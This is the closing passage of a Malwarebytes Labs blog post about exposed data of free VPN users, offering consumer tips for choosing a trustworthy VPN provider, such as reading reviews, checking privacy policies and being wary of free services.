Remember, a VPN can help protect your traffic from being viewed by your Internet Service Provider, which could be a major telecom company, or it could be a university or a school. A VPN can also help protect you from government requests for your data. For instance, if you’re doing investigative work in another country with a far more restrictive government, a VPN could help obfuscate your Internet activity from that government, should it take interest in you.

The important thing to note here, though, is that a VPN is merely serving as a substitute for who sees your data. When you use a VPN, it isn’t your ISP or a restrictive government viewing your activity—it’s the VPN itself.

So, how do you find a trustworthy VPN provider who is actually going to protect your online activity? Here are a few guidelines:

• Read trusted, third-party reviews. Many of the issues in the above apps were spotted by good third-party reviewers. When picking a VPN provider, rely on the words of some trusted outlets, such as Tom’s Guide, TechRadar, and CNET.
• Ensure that a VPN provider has a customer support contact. Several of the VPN apps investigated by vpnMentor lacked any clear way to contact them. If you’re using a product, you deserve reliable, easy-to-reach customer support.
• Check the VPN’s privacy policy. As we learned above, a privacy policy is not a guarantee for actual privacy protection, but a company’s approach to a privacy policy can offer insight into the company’s thinking, and how much it cares more about its promises.  
• Be cautious of free VPNs. As we wrote about last week, free VPNs often come with significant trade-offs, including annoying ads and the surreptitious collection and sale of your data.
• Consider a VPN made by a company you already trust. More online privacy and cybersecurity companies are offering VPN tools to supplement their current product suite. If you already trust any of those companies—such as Mozilla, Ghostery, ProtonMail, or, yes, Malwarebytes—then there’s good reason to trust their VPN products, too.

It’s a complicated online world out there, but with the right information and the right, forward-looking research, you can stay safe.

The post 21 million free VPN users’ data exposed appeared first on Malwarebytes Labs.